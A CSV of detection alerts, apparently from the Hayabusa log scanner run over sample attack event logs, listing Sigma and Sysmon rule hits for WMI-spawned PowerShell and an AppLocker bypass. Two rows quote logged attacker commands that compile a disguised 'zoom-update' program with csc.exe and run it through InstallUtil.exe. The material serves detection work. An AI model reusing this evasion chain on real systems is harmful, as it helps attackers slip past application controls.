2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs : Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil : Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx